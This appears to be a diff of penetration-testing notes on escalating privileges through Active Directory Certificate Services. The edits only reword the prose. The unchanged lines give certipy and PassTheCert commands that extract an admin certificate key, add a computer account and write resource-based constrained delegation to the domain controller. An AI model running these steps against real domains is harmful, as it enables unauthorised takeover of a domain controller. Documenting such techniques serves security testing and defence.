ADCS - Privilege Escalation as a Service

 certipy cert -pfx ADMIN.pfx -nocert -out ADMIN.key

-After that we create a new computer, if we do not have control over one yet.
+After that, we'll create a new computer if we don't already have control over one.
 Login as the system should be possible with a password.

 python3 PassTheCert/Python/passthecert.py -dc-ip IP_DC -crt ADMIN.crt -key ADMIN.key -domain DOMAIN -action add_computer -computer-name NEW_COMPUTER

-Then we create a delegation from our "new computer" to the domain controller. msDS-AllowedToActOnBehalfOfOtherIdentity, a ResourceBasedConstrainedDelegation.
-For assistance the -delegate-from and -delegate-to: the from is the computer that I control, and the data I write in the to, so my goal.
+After that we create a delegation from our "new computer" to the domain controller. msDS-AllowedToActOnBehalfOfOtherIdentity, a ResourceBasedConstrainedDelegation.
+That to help -delegate-from and -delegate-to: the from is the computer that I control and the data I write in the to, which is my goal.

 python3 PassTheCert/Python/passthecert.py -dc-ip IP_DC -crt ADMIN.crt -key ADMIN.key -domain DOMAIN -action write_rbcd -delegate-from NEW_COMPUTER -delegate-to FQDN_DC